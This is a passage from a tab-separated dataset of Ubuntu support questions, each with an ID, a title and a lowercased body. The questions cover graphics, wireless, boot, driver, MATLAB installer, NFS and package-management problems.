417594	blurred lines in cairo gtk	i have noticed that cairo_set_source_rgb ( cr , 0.0 , 0.0 , 0.0 ) ; // color black cairo_set_line_width ( cr , 1.0 ) ; // line width in pixels cairo_move_to ( cr , 10.5 , 10.5 ) ; cairo_line_to ( cr , 10.5 , 100.5 ) ; cairo_stroke ( cr ) ; draws a nice thin black line 1 pixel wide . but cairo_set_source_rgb ( cr , 0.0 , 0.0 , 0.0 ) ; // color black cairo_set_line_width ( cr , 1.0 ) ; // line width in pixels cairo_move_to ( cr , 10.0 , 10.0 ) ; cairo_line_to ( cr , 10.0 , 100.0 ) ; cairo_stroke ( cr ) ; draws a blurred gray line 2 pixels wide . i can not find an explanation in the literature or the docs . apparently , to get sharp 2d graphics one has to take a 0.5 in the coordinates into account . some examples on the internet do indeed do that . but they do not give a reason . why is this so ? where is it documented ?
417596	intel and nvidia . how run both on desktop . not bumblebe !	i have my desktop with two video adapters ( intel and nvidia 210 ) i want use them both the same time . is this possible ? they are actually works on the same time but nvidia works with artefacts ( nouveau driver ) then intel card enable . resume from hibernate not work at all . any chance have both card without issues ?
417600	wireless network adapter stays hard blocked	i recently installed ubuntu for the first time and i really like it . but there is one problem i ca n't get rid off : my wireless adapter stays harblocked . so the option enable wifi in the network menu remains grayed out and i ca n't find the router where my laptop stands next to . $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no i tried ublocking it , on the command line and on my keyboard ( fn+f2 did the trick in w8 ) but nothing seems to affect it . my network card : $ lspci | grep wireless 02:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) some other information : $ nm-tool networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : unavailable default : no hw address : 24 : fd:52 : c5 : cc : b5 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points lshw -class network $ sudo lshw -class network *-network disabled description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 24 : fd:52 : c5 : cc : b5 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.11.0-15-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7d00000-f7d7ffff memory : f7d80000-f7d8ffff uname $ uname -a linux brecht-laptop 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux i also tried adding a file named ath9k.conf in /etc/modprobe.d/ with some options in it but still no results . i also tried some other things i read on google without even knowing well what i was doing but nothing seems to help . so can someone help me out with this ? i really like linux but this is an unfortunate hiccup . update : i found out that my wifi works just fine if i close my laptop and reopen it ( so after going to sleep mode or whatever it 's called in linux ) . but this is not the perfect solution i guess .
417602	ubuntu only displays on hdmi port	i 've installed ubuntu 13.10 on an asus ux302lg with nvidia 730m . when booted up on both livecd and on the instalation , only the hdmi port will display the screen . laptop screen is `` on '' , and the system can see it , but it does n't show anything . what can i do to make it show the screen ?
417604	wine shows 0 disk space	i am using wine to install matlab but wine is showing that there is no disk space in your drive . but i have still more that 50 gb free space in my drive . i used matlab 2011 setup also to install but problem is remaining same . here is status of my machine filesystem 1k-blocks used available use % mounted on /dev/sda1 47929224 20667520 24820336 46 % / udev 1019496 4 1019492 1 % /dev tmpfs 411056 840 410216 1 % /run none 5120 0 5120 0 % /run/lock none 1027640 156 1027484 1 % /run/shm /dev/sda5 1888268 29460 1761224 2 % /boot /dev/sdb1 7822424 7711664 110760 99 % /media/06d8a9d6d8a9c3f1 /dev/loop0 5073422 5073422 0 100 % /media/matlab
417605	libevent2 for ubuntu 10.10	i am using ubuntu 10.10 trying to install libevent2 . i used the below command- apt-get install libevent-dev libevent1-dev but it says- unable to locate package libevent1-dev can anyone please let me know what am i doing wrong here ? does ubunutu 10.10 does n't support libevent2 ?
417607	loud fans despite cool system under linux ( but not windows )	my new desktop computer runs almost silently under windows , but the fans seem to run on a constantly high setting under linux . psensor shows that the gpu ( with nvidia drivers ) is thirty-something degrees and the cpu is about the same , so it 's not just down to linux somehow being more processor-intensive . i 've read that the bios controls the fans under linux , which makes sense given the high fan speeds when in bios as well . it 's under windows , when the asus ai suite 3 software seems to take control , that the system runs more quietly and only speeds the fans up when required . so is there a linux app which offers a similar dynamic control of the fans , or a setting hidden somewhere in the asus bios which allows the same but regardless of the os ? edit - i 've tried using lm-sensors and fancontrol , but pwmconfig tells me `` there are no pwm-capable sensor modules installed '' . this is after the sensors-detect command does find an 'intel digital thermal sensor ' , and despite the sensors working fine in apps like psensor . help getting this to work would likely solve the problem .
417608	matlab 2011a installer show error in ubuntu 12.04 lts	i made changes in install file for the automatic installation . here is my file use this file to specify parameters required by the installer at runtime . instructions for using this file . 1 . create a copy of this template file and fill in the required information . uncomment and set desired values ; all available values are listed below . 2 . launch the installer from the command line , using the -inputfile option to specify the name of your installer initialization file . ( windows ) setup.exe -inputfile < file_name > ( mac/unix ) install -inputfile < file_name > note : if you want to run the activation application in silent mode immediately after the installer completes , you must create an activation initialization file and specify its name as the value of the activationpropertiesfile= option . you can also pass the name of the activation initialization file to the installer using the -activationpropertiesfile command line option . specify installation folder example : ( windows ) destinationfolder=c : \program files\matlab\rxxxx ( unix ) destinationfolder=/usr/local/rxxxx ( mac ) destinationfolder=/applications destinationfolder=/usr/local/matlab specify file installation key example : fileinstallationkey=xxxxx-xxxxx-xxxxx-xxxxx ... .. fileinstallationkey=27148-10273-27823-12342-16466 accept license agreement you must agree to the license agreement to install mathworks products . the license agreement can be found in the license.txt file at the root level of the installation dvd . example : agreetolicense=yes agreetolicense=yes specify output log specify full path of file into which you want the results of the installation to be recorded . example : ( windows ) outputfile=c : \temp\mathworks_ < user_name > .log ( unix/mac ) outputfile=/tmp/mathworks_ < user_name > .log outputfile=/tmp/mat/matlab.log specify installer mode interactive : run the installer gui , waiting for user input on all dialog boxes . silent : run the installer without displaying the gui . automated : run the installer gui , displaying all dialog boxes , but only waiting for user input on dialogs that are missing required input . set to interactive , silent , or automated . mode=interactive specify length of time dialog boxes are displayed specify how long the installer dialog boxes are displayed , in milliseconds . note : use this value only if you set the installer mode to automated . by default , the dialog boxes display on the screen for one second . example : ( to specify a value of 1 second . ) automatedmodetimeout=1000 automatedmodetimeout= specify activation properties file ( for non-network license types only ) enter the path to an existing file that contains properties to configure the activation process . activationpropertiesfile= begin : options for network license types specify path to license file ( required for network license types only ) this value is required when installing either the license manager or when installing as a network end-user example : ( windows ) licensepath=c : \temp\license.dat ( unix ) licensepath=/tmp/license.dat licensepath= choose to install license manager ( for network license types only ) installs license manager files to disk . note : you only need to install the license manager files on your license server . set to true or false . lmgrfiles= install license manager as a service ( for network license types only ) configure the license manager as a service on windows . note : not applicable for unix or mac . note : the lmgr_files option ( set in previous step ) must also be set to true . set to true or false . lmgrservice= end : options for network license types begin - windows only options choose to create windows desktop shortcut set to true if you would like the installer to create a desktop shortcut icon when matlab is installed or false if you do n't want the shortcut created . set to true or false . desktopshortcut= choose to add shortcut to windows start menu set to true if you would like the installer to create a start menu shortcut icon when matlab is installed or false if you do n't want the shortcut created . set to true or false . startmenushortcut= end - windows only options specify products you want to install by default , the installer installs all the products and documentation for which you are licensed . products you are not licensed for are not installed , even if they are listed here . to install specific products , uncomment the line for the product ( s ) you want to install . product.aerospace_blockset product.aerospace_toolbox product.bioinformatics_toolbox product.communications_system_toolbox product.computer_vision_system_toolbox product.control_system_toolbox product.curve_fitting_toolbox product.do_qualification_kit product.dsp_system_toolbox product.data_acquisition_toolbox product.database_toolbox product.datafeed_toolbox product.eda_simulator_link product.econometrics_toolbox product.embedded_coder product.filter_design_hdl_coder product.financial_derivatives_toolbox product.financial_toolbox product.fixed_income_toolbox product.fixed_point_toolbox product.fuzzy_logic_toolbox product.gauges_blockset product.global_optimization_toolbox product.iec_certification_kit product.image_acquisition_toolbox product.image_processing_toolbox product.instrument_control_toolbox product.matlab product.matlab_builder_ex product.matlab_builder_ja product.matlab_builder_ne product.matlab_coder product.matlab_compiler product.matlab_distributed_computing_server product.matlab_report_generator product.mapping_toolbox product.model_predictive_control_toolbox product.model_based_calibration_toolbox product.neural_network_toolbox product.opc_toolbox product.optimization_toolbox product.parallel_computing_toolbox product.partial_differential_equation_toolbox product.phased_array_system_toolbox product.rf_toolbox product.real_time_windows_target product.robust_control_toolbox product.signal_processing_toolbox product.simbiology product.simdriveline product.simelectronics product.simevents product.simhydraulics product.simmechanics product.simpowersystems product.simrf product.simscape product.simulink product.simulink_3d_animation product.simulink_coder product.simulink_control_design product.simulink_design_optimization product.simulink_design_verifier product.simulink_fixed_point product.simulink_hdl_coder product.simulink_plc_coder product.simulink_report_generator product.simulink_verification_and_validation product.spreadsheet_link_ex product.stateflow product.statistics_toolbox product.symbolic_math_toolbox product.system_identification_toolbox product.systemtest product.vehicle_network_toolbox product.wavelet_toolbox product.xpc_target product.xpc_target_embedded_option but it shows error that root @ labe-1294-0-170 : /home/umeshkumar/desktop/mat # ./installer ./installer : line 169 : product.aerospace_blockset : command not found ./installer : line 170 : product.aerospace_toolbox : command not found ./installer : line 171 : product.bioinformatics_toolbox : command not found ./installer : line 172 : product.communications_system_toolbox : command not found ./installer : line 173 : product.computer_vision_system_toolbox : command not found ./installer : line 174 : product.control_system_toolbox : command not found ./installer : line 175 : product.curve_fitting_toolbox : command not found ./installer : line 176 : product.do_qualification_kit : command not found
417609	grub rescue after installing ubuntu 13.10 next to window 8	i try installing ubuntu 13.10 next to windows 8 on my laptop , but i was all the time booting on windows 8 ... so i execute a boot repair from a live usb ... and since then i 'm getting a nice black screen with grub rescue ... here is the url boot repair gave me . i know witch of my partition is the linux one on my disk can read what is on with : ls ( hd0 , gpt5 ) / but that 's pretty much all what i can do ! ( i 'm a begginer with linux and i ca n't access to the bios to modify any setup for the moment ... ) thanks for your help !
417612	the computer dead after upgrading ubuntu	in the middle of upgrading my ubuntu installation to the latest version , my computer turned off ( the battery ran out ) , and now my computer does n't work - even when i try to run the system from boot cd ! what can i do to resolve this issue ?
417614	lg optimus vu ubuntu mobile	i just want to ask if ubuntu mobile is available for lg optimus vu and how to install it if it is available . thanks and more power mj
417617	msi ge70 not able to get any internet connection	after much trouble i was finally able to install ubuntu 12.04 64bit on my new msi ge70-2oe laptop . now i ca n't access any internet , either through wired or wireless , although both the wireless and wired connections work on windows 8 . i 've tried to find drivers , but all the drivers i can find require you to download them in ubuntu . i have a realtek rtl8723ae wireless card and a killer e2200 gigabit ethernet controller . any help on either the wireless or wired connections would be much appreciated .
417618	wubi installation creates equal size separate virtual disks for root and usr	i like wubi install better than a standard install in a dual boot configuration but i have some issues here , namely i was never able to resize the usr virtual disk so i be able to install more software without running out of space . wubi automatically creates equal size virtual disks for root and usr . further more , it seems that no matter the size of the `` partition '' i allocate for wubi installation , it will always create 2 virtual disks of no more than 4 gb max for root and 4 gb max for usr . i tried it on a 16 gb install , and then allocated more than 16 gb but wubi wo n't have more than 4gb for root and another 4 gb for usr virtual disk which seems to be the maximum limit for a wubi installation . i use fat32 partition when installing ubuntu from windows but i do n't think this is the reason i ca n't get a 6gb or more for the usr virtual disk . it would have been much better to have a single larger virtual disk for both root and usr , and a separate virtual disk for for home . is there a workaround for this problem ? i know many people do n't like wubi but i do , and i hope you 'll keep it alive because it is truly a nice and unique piece of software and a good reason for average users like me to give ubuntu a chance , and use ubuntu without having to repartition hdd for a standard installation ( tried it twice in the past and was unhappy because i could not shutdown windows as usual , had to actually press the button for complete power off ) . thanks for reading this , and i hope there is an answer for my question . all the best to you all , ubuntu developers and fans !
417619	is ubuntu `` workable/possible '' on a 3200 x 1800 resolution screen ?	i 'm buying a laptop with that resolution later , and i 'm willing to use ubuntu or some other linux os without full resolution independent support for now , but i guess i 'm wondering if it 's possible at all to run a linux os on that resolution or are many apps just too tiny for it to be workable ? in other words , is it possible to do day to day work on ubuntu on a 3200 x 1800 screen ? the laptop i 'm buying is dell xps 15 .
417620	how to make `` search on google '' available in selected text 's context menu in gnome-terminal ?	i want to have an option like search on google available in selected text 's context menu in gnome-terminal . something similar to the option which is available in selected text 's context menu in google chrome / chromium / firefox browser : so , something similar like in the above image , but in gnome-terminal . is this possible ?
417626	unable to start ubuntu in dual boot	i was working with ubuntu 13.10.it was working properly , then i tried to install centos from livedvd . first i created 100gb free space after that i boot from live dvd after that use free space as storage ( that 100 gb ) . now when i open my desktop.its start centos and in centos its showing 361 gb partition of ubuntu .but i am not able to start ubuntu . please help how to start ubuntu .
417627	how to make ricoh aficio sp 100 work on ubuntu 13.10	i bought a ricoh aficio sp 100 monochome laser printer , but have been unable to make it work on ubuntu 13.10 . the printer has been detected , but the database does n't have a driver for it . the closest it has to offer is aficio sp 1000s , which does not work . on giving command for print , the dialog box shows rendering , then task 'completed ' , but it does not print anything . how can i fix this ?
417628	nfs : failed to create mnt rpc client status = -101	i am trying for network file system ( nfs ) booting between two systems . i am using dhcp server to assign ip-address for client . and my kernel and root file system are present in server . my client is able to load the kernel . but cant able to mount the root filesystem . i am getting error regarding remote procedure call ( rpc ) the following lines appear while booting at client side nfs : mntpath : '/nfsroot' nfs : sending mnt request for 172.16.6.237 : /nfsroot nfs : failed to create mnt rpc client , status=-101 nfs : unable to mount server 172.16.6.237 , error -101 vfs : unable to mount root fs via nfs , trying floppy . vfs : can not open root device `` nfs '' or unknown-block ( 2,0 ) please append a correct `` root= '' boot option ; here are the available partitions : 0000 bla bla bla kernel panic- not syncing : vfs : unable to mount root fs or unknown-block ( 2,0 ) the above lines are few lines when i am doing nfs ( network file system ) . in kernel configuration i enabled all necessary flags for nfs support . in above error the line related to rpc client is present in kernel fs/nfs/mount_clnt.c program . i also came to know that the error occurs in rpc_ping ( ) function which is present in net/sunrpc/clnt.c file . waiting for help thanks in advance
417632	dbus and preempt-rt patch compatibility	i’m working on a project which need to use dbus under linux kernel patched with preempt-rt . following the preempt-rt wiki , each rt application needs to have some modification about policy and priority concerning the scheduling . in my project , dbus will transfer messages with high priority for rt needs and others with normal priority for basic operations . my question is : do exist a patch to dbus to be compatible with preempt-rt extension in order to have dbus as an rt application ? i searched on the internet to find an answer but i didn’t . this is why i’m asking here this question . i really thank you for an eventual answer . i’m sorry if it’s not the right place to ask this question . in this case , could you tell me where to ask this kind of question ?
417641	back-port a package	the problem is that the package i need is coming from version 14.04 and i run 12.04 so i get the foo.dsc and try to build it using pbuilder , but the foo.dsc needs some other pkgs version which are no exits in the verion 12.04 , so it failed . i started to download each required pkg ( bar.dsc , zoo.dsc , etc… ) that foo was depend on , but then got to a endless loop , since bar.dsc also wanted some pkg that where missing in the 12.04 . so i play a little with the control file of the foo pkg , and got to a point where i had only 4 pkg that need to come from version 14.04 to version 12.04 . i manage to build them , and also create a local repo , so the base image of pbuilder will be aware of them . then try to build the foo.dsc and failed again . what am i’m doing wrong ? it’s being a week already without any sleep – and i just can’t figure it out . help will be mot welcome ! thank sassy
417642	logical volume , physical volume and volume groups	please can someone explain to me the meaning of logical volume , physical volume and volume groups ? of what importance and advantage are they in linux ?
417643	change font color on boot	my question is how to change the font color when ubuntu boots up ( not grub ! ) . i want a font color to be # 00ff00 ( green ) on a screen like this one : http : //oi43.tinypic.com/2h4bwxd.jpg . thanx in advance
417645	how to install blender 2.6 on ubuntu 13.10	i 'm a newbie to ubuntu . i 'm in love with ubuntu now < 3 i do n't want to use another os again ! so , i downloaded blender 2.6 on my brand new ubuntu 13.10 and extracted . but i do n't have any idea how to install . please will you help me guys ? thanks a lot !
417646	asus k55vd problem booting into windows 8.1 after ubuntu installation	please help . i installed ubuntu 12.04 lts and now i 'm unable to boot into my pre-installed windows 8.1 . i partitioned my hard disk into four partitions excluding that of windows and installed ubuntu in one of the partitions . after ubuntu finished installing , i restarted my computer and behold windows was gone ! it got a little frightening at first so the ubuntu grub has taken over the boot process and when it asks me to choose which os to boot and i choose to load windows , it shows me some sort of an error message . is there anything i can do to make my pc dual boot ? -- pc_specifications -- asus k55vd 6gb ram 750 gb hdd
417650	how to make package management more efficient when package versions in ubuntu are lagged ?	original title : why are package versions in ubuntu so lagged ? how to make package management more efficient ? ( edited to avoid duplicate questions , see comments below ) backgroud : i started using ubuntu occasionally since 2009 , and used xubuntu on a daily basis for about four months last year . now , i have been using arch linux in virtualbox under windows7 for about two months . last week , i turned back to update my previously installed xubuntu for a full linux setup . honestly , it annoyed me a lot . with archlinux , updating packages is much much easier than that in ubuntu . under arch linux , i rarely have to build binaries from source codes by myself ( aur would do most part of the work ) . however under ubuntu , since versions of many packages are much older than their official developer releases , i have to configure and build them bit by bit , tweaking settings , finding missing dependencies all by myself . sometimes , i am lucky enough to find private repositories ( but they could be easily fragmented , and hard to track over time ) , sometimes i literally have to do a lot research to find out what package contains some files missed . it is very frustrating . question : why are many packages in ubuntu so lagged while arch linux has more bleeding edge updates ? are there any tips/methods to make package management under ubuntu more efficient ?
417651	asus x79-deluxe fan control	can anybody help about how to have a control over peripheral fans attached to a asus x79-deluxe motherboard with an intel chip in ubuntu environment ? the ubuntu i use is based on 12.04 with updated to the latest packages recommended by update manager ! any other information you need please write ! so far i tried lm-sensor and after sudo pwmconfig command it says there are no pwm-capable sensor modules installed . thanks , parham
417654	lenovo s10-3 wireless problems	i have the lenovo s10-3 machine and i have wireless problems . i am running xubuntu 12.04 . i had to lspci -k to identify my driver and install the correct broadcom drivers to get it out of hard blocked . rfkill list shows nothing is blocked now and everything seems to be working but it can not find a single wireless connection . any suggestions ? thanks
417655	`` no space left on device '' /dev/loop0 ''	been using ubuntu for a couple of weeks now and have encountered a problem . i have the message `` no space left on device '' and after searching for a while i found that /dev/loop0 is taking up huge space . how do i unmount/empty /dev/loop0 ? after command : df -h greger @ ubuntu : / $ df -h filesystem size used avail use % mounted on /dev/loop0 12g 11g 627m 95 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 791m 1000k 790m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 388k 2.0g 1 % /run/shm /dev/sda4 151g 12g 139g 8 % /host am i right if this command means that a lot of processes is using it ? greger @ ubuntu : / $ fuser -m /dev/loop0 /dev/loop0 : 1905 1945 1946 1960 1968 1970 1977 1989 1992 1997 2000 2002 2008 2009 2010 2013 2019 2020 2027 2029 2040 2044 2048 2051 2052 2055 2061 2069 2077 2094 2096 2098 2106 2108 2109 2139 2141 2162 2192 2201 2203 2205 2207 2209 2242 2254 2256 2276 2284 2293 2300 2316 2330 2339 2348 2438 2447 2449 2453 2572 what shall i do ?
417658	overheating problem with driver fglrx on ati radeon h5000 - mobility radeon h4000	i have an hp pavilion dv6-3127 el , with installed ubuntu 12.04 , i do n't use new version of ubuntu becouse i have overheating problem , temperature about 90 degree , instead in 12.04 i do n't have this problem . but , in 04/02/14 i do the updates and after i have overheating problem . where i can find the old driver fglrx , so i can reinstall in my pc ? thanks for attention and excuse me for my elementary english . bye !
417659	grand theft auto san andreas & sa-mp 12.04	i just wan na start by saying i absolutely love ubuntu 12.04 ! i made the swap from windows 7 last night and i ai n't looked back not once . everything i enjoyed using on windows 7 is on ubuntu and ten times better . it 's a lot faster on my computer as well , that 's always a plus . i install gta sa using my cd through wine . everything looked like it was gon na happen - i was actually gon na play my beloved sa on my newfound joy . once i get through installation , it tells me i need directx9 . after spending hours on google figuring out how to get directx9 in wine i try to load sa again . this time i 'm faced with a white screen , that goes black then turns white again before eventually just going all black . the resolution also changes to 800x600 . i have to go system settings & change my resolution again to get it back after killing the process . i read a thread i found through google on some random forums from a few years back saying windows games do n't play on ubuntu 12.04 . if this is the case , then i 'll try and upgrade/downgrade to another ubuntu version then try my luck with getting sa to work all over again . if this is n't the case , then please tell me what it is i 'm doing wrong - or what i can do to overcome this obstacle . thanks in advance .
417660	compiling with boost fails `` no such file or directory ''	i 'm a newbie , and i ca n't compile the moses translation tools . here 's my command : sudo ./bjam -- with-boost=~/home/ubuntu/boost_1_55_0 -j8 a lot of files compile but after a while i keep getting warnings like ... failed gcc.compile.c++ lm/filter/bin/gcc-4.7/release/debug-symbols-on/link-static/threading-multi/main.o ... gcc.compile.c++ lm/filter/bin/gcc-4.7/release/debug-symbols-on/link-static/threading- multi/arpa_io.o in file included from /usr/local/include/boost/scoped_array.hpp:14:0 , from ./lm/filter/arpa_io.hh:11 , from lm/filter/arpa_io.cc:1 : /usr/local/include/boost/smart_ptr/scoped_array.hpp:17:51 : fatal error : boost/smart_ptr/detail/sp_nullptr_t.hpp : no such file or directory compilation terminated . i copied the 'boost ' folder to usr/local/include , but it did n't help . i have no idea how boost works , i only know it is some collection of c++ libraries , please keep that in mind : ) thanks in advance .
417662	restrictions for unprotected adhoc network ?	question : i need to connect my chromebook , which has only wlan to my rj45-lan . to do this , i created an ad-hoc wirless hotspot on my ubuntu laptop , so i can connect the chromebook to this hotspot . i used this method : http : //www.howtogeek.com/116409/how-to-turn-your-ubuntu-laptop-into-a-wireless-access-point/ recommended here : how to set up ubuntu as wireless accesspoint ? it works if i do n't encrypt the network . if i set the encryption to wep/wpa/wpa2 , and put in a password , then it does n't work . i alternately get those two errors : - dhcp error - wrong password but the password is correct , and connecting to a normal wpa2 hotspot works on the chromebook , just not the ad hoc one . how can i add some kind of access restrictions ( e.g . limit mac addresses ) on the unprotected wlan ?
417665	how to get sd card reader working realtek device 5287	i 'm using ubuntu 13.10 . the sd card reader is not working.lspci shows this : 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5287 ( rev 01 ) i do n't know what i changed but a month earlier it worked well ...
417670	failed to move *.deb to /var/cache/apt-cacher/packages/*.deb : permission denied	i followed following post how to set up an apt-cacher server ? , but having this error : got @ got-mypc : /var/cache/apt/archives $ sudo /usr/share/apt-cacher/apt-cacher-import.pl /var/cache/apt/archives/ importing from /var/cache/apt/archives/ moving package files from /var/cache/apt/archives/ to /var/cache/apt-cacher importing : account-plugin-facebook_0.8-0ubuntu2.2_i386.deb failed to move account-plugin-facebook_0.8-0ubuntu2.2_i386.deb to /var/cache/apt-cacher/packages/account-plugin-facebook_0.8-0ubuntu2.2_i386.deb : permission denied . try read-only ( -r ) or symlink ( -l ) options . at /usr/share/apt-cacher/apt-cacher-import.pl line 364 . why facebook error since i have n't installed any plugins for fb atleast by myself . also i tried this using root login but did n't work . how to solve this now .
417671	installing mysql 5.1 with ubuntu 12.04	i have ubuntu 12.04 installed , i need to install mysql 5.1 in that . following steps i performed : other things to be installed : run this command to install alien and other necessary packages if not installed : sudo apt-get install alien dpkg-dev debhelper build-essential mysql installation : if you have already mysql installed ( higher version than 5.1 ) then uninstall . extract `` mysql-5.1.73-1.glibc23.i386.rpm-bundle.tar '' in same dir . and , navigate to `` mysql-5.1.73-1.glibc23.i386.rpm-bundle '' issue following command to convert mysql-server rpm to deb : sudo alien mysql-server-5.1.73-1.glibc23.i386.rpm issue following command to convert mysql-client rpm to deb : sudo alien mysql-client-5.1.73-1.glibc23.i386.rpm issue following command to install mysql-server : sudo dpkg -i mysql-server_5.1.73-2_i386.deb issue following command to install mysql-client : sudo dpkg -i mysql-client_5.1.73-2_i386.deb after the installation i 'm getting the following error : mysql error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/lib/mysql/mysql.sock ' ( 2 ) after installation mysql.sock file is missing also my.cnf file is also missing . i had refered the site http : //www.howtogeek.com/howto/ubuntu/install-an-rpm-package-on-ubuntu-linux/ for rpm package installation in ubuntu i need to install a software that is compatable with mysql 5.1 , i had tried to install with mysql 5.5 i got the following error com.mysql.jdbc.exceptions.mysqlsyntaxerrorexception : you have an error in your sql syntax ; check the manual that corresponds to your mysql server version for the right syntax to use near 'type=innodb ' at line 1 is there any other way that i can install mysql 5.1 in ubuntu 12.04 ?
417674	gnuplot 4.6 no x11 path	i just installed gnuplot 4.6 on my ubuntu 12.04 and i do n't have x11 as an option for the terminal . when i try to use : 'sudo apt-get install gnuplot-x11 ' , the message is 'gnuplot-x11 is already the newest version . ' i checked the config.log file and the entry regarding x11 is : 'conftest.c:28:22 : fatal error : x11/xlib.h : no such file or directory compilation terminated . edit : the wxt is not part of the terminal options either . those are the installed packages i have ( dpkg -l | grep -i gnuplot ) : ii gnuplot-nox 4.4.3-0ubuntu3 a command-line driven interactive plotting program ii gnuplot-x11 4.4.3-0ubuntu3 a command-line driven interactive plotting program is the problem that i have both nox and x11 installed ?
417675	how to run runsheduledtask.php file in cli	when i am running runsheduledtasks.php from terminal , an error occured like `` could n't open input file : runsheduledtasks.php '' please give suggestion to remove this error .
417681	ca n't boot after installing nvidia drivers	ok , so i decided to install more recent drivers because i started experiencing some crashes with rust . do n't think it 's related , but that 's the first thing i would do in windows . so , i found out how to exit x and install it there , did it and it all looked fine . went through the prompts , accepted everything and then restarted . now , every time i boot , i get past grub and then i get a black screen with a flashing dash . i can get to recovery mode , but i do n't know what to do there . pls help .
417683	ubuntu core keeps logging me out after successful login	i installed ubuntu core following this tutorial : https : //wiki.ubuntu.com/core/installationexample i tried these kernels linux-image-3.2.0-58-generic-pae_3.2.0-58.88_i386 linux-image-3.2.0-23-generic-pae_3.2.0-23.36_i386 with their dependencies libnl-3-200_3.2.3-2ubuntu2_i386 libnl-genl-3-200_3.2.3-2ubuntu2_i386 wireless-regdb_2011.04.28-1ubuntu3_all crda_1.1.2-1ubuntu1_i386 wireless-crda_1.16_i386 the fs i used ubuntu-core-12.04.3-core-i386.tar.gz i did this on a virtual machine running on vmware esxi 5.1.0 with 1 gb ram i tried adding a user without the adm/sudo group , but i get logged out with that one too . also edited /etc/network/interfaces to # the loopback network interface auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet dhcp but the dhcp server doese n't show any dhcp request i also installed rsyslog but the auth.log is empty . what can i do ?
417684	problem with thermal monitoring in ubuntu 12.04	i have an issue with the thermal monitoring in ubuntu 12.04 : i think the os mapped a negative temperature ( -1째 , it was actually pretty cold ) to 255째 and the system refused to boot . the message was saying something like `` overheat protection , 255째 '' . i am not 100 % sure whether this was caused by an os bug or wrong readings delivered by the termperature sensors , but i had 5 other , identical hardware setups ( different os ) at the same time that did not complain which gives a strong prior an the os . is there : ( a ) a known bug that might cause this ( b ) a workaround that does not involve deactivating the thermal monitoring completely thanks for your answers !
417685	how to require mount with password of other internal hdd partitions for all mount-style applications ( with udev )	i am trying to block access to other partitions with different file systems on the same physical hdd ( layout : gpt ) by preventing any partition mounting without requiring a password . fstab takes care of using mount with password . if it is not in fstab , it will require a password . for nautilus and udisks i was trying udev setting env { udisks_ commands like such : kernel== '' sda10 '' , env { udisks_presentation_nopolicy } = '' 1 '' , env { udisks_system_internal } = '' 1 '' i have verified that the env are added by using udevadm info -- name= '' /dev/sda10 '' -- query=all but this does not seem to stop ( non-gksudo ) nautilus or udisks from mounting the partition when clicked . i would like it to prompt a password when it tries . as is specified here : http : //manpages.ubuntu.com/manpages/precise/man7/udisks.7.html if set , this will override the usual bus type based detection of whether a device is considered `` system internal '' . `` 0 '' means `` removable '' ( i. e. eligible for automounting , and normal users can mount ) , any other value means `` system internal '' ( i. e. no automounting , and only administrators can mount ) . thanks in advance . p.s . in contrast using this kernel== '' sda10 '' , env { udisks_presentation_hide } = '' 1 '' does stop nautilus from presenting the partition in the devices section . all though hiding probably does not stop udisks from mounting it anyway ( have not tried that ) .
417686	how to flush dns in ubuntu 13.10 ?	we recently moved our website to a new server . but after changing the ns ( name server ) records , i ca n't access my website . the hosting provider said we need to flush the dns settings in order to see the new website . i searched relating to this but i could n't find a way to flush dns settings in ubuntu 13.10 .
417690	libre/openoffice crashes when openning	i 'm having a problem with the office suites on ubuntu 12.04 . libreoffice was n't starting in anyway . i tryed reinstall it , and nothing changed . so i completelly removed it , and installed apache openoffice , and the same problem occurs . does anyone have any idea on how to fix it ? when i open it from terminal i get : rafael @ pimenta : ~/pt-br/debs/desktop-integration $ openoffice4 application error fatal exception : signal 6 stack : /opt/openoffice4/program/libuno_sal.so.3 ( +0x22001 ) [ 0xb75b8001 ] /opt/openoffice4/program/libuno_sal.so.3 ( +0x220fd ) [ 0xb75b80fd ] /opt/openoffice4/program/libuno_sal.so.3 ( +0x221aa ) [ 0xb75b81aa ] [ 0xb775c400 ] /opt/openoffice4/program/libvcl.so ( _zn11application5aborterk6string+0x1a ) [ 0xb5d0f9ca ] /opt/openoffice4/program/libsofficeapp.so ( +0x1b34b ) [ 0xb754734b ] /opt/openoffice4/program/libvcl.so ( +0x130bfe ) [ 0xb5d15bfe ] /opt/openoffice4/program/libvos3gcc3.so ( _zn3vos26signalhandlerfunction_implepvp13oslsignalinfo+0x12 ) [ 0xb5bdadf6 ] /opt/openoffice4/program/libuno_sal.so.3 ( +0x210c6 ) [ 0xb75b70c6 ] /opt/openoffice4/program/libuno_sal.so.3 ( +0x22193 ) [ 0xb75b8193 ] [ 0xb775c400 ] /opt/openoffice4/program/libvcl.so ( +0x19be63 ) [ 0xb5d80e63 ] /opt/openoffice4/program/libvcl.so ( _zn3vcl14openttfontfileepkcmppns_13_truetypefonte+0xec ) [ 0xb5d81454 ] /opt/openoffice4/program/libvcl.so ( _znk3psp16printfontmanager19analyzetruetypefileepns0_9printfonte+0x8c ) [ 0xb5cc8f4e ] /opt/openoffice4/program/libvcl.so ( _znk3psp16printfontmanager15analyzefontfileeirkn3rtl7ostringerkst4listis2_sais2_eers5_ipns0_9printfontesaisb_ee+0x582 ) [ 0xb5ccaf74 ] /opt/openoffice4/program/libvcl.so ( 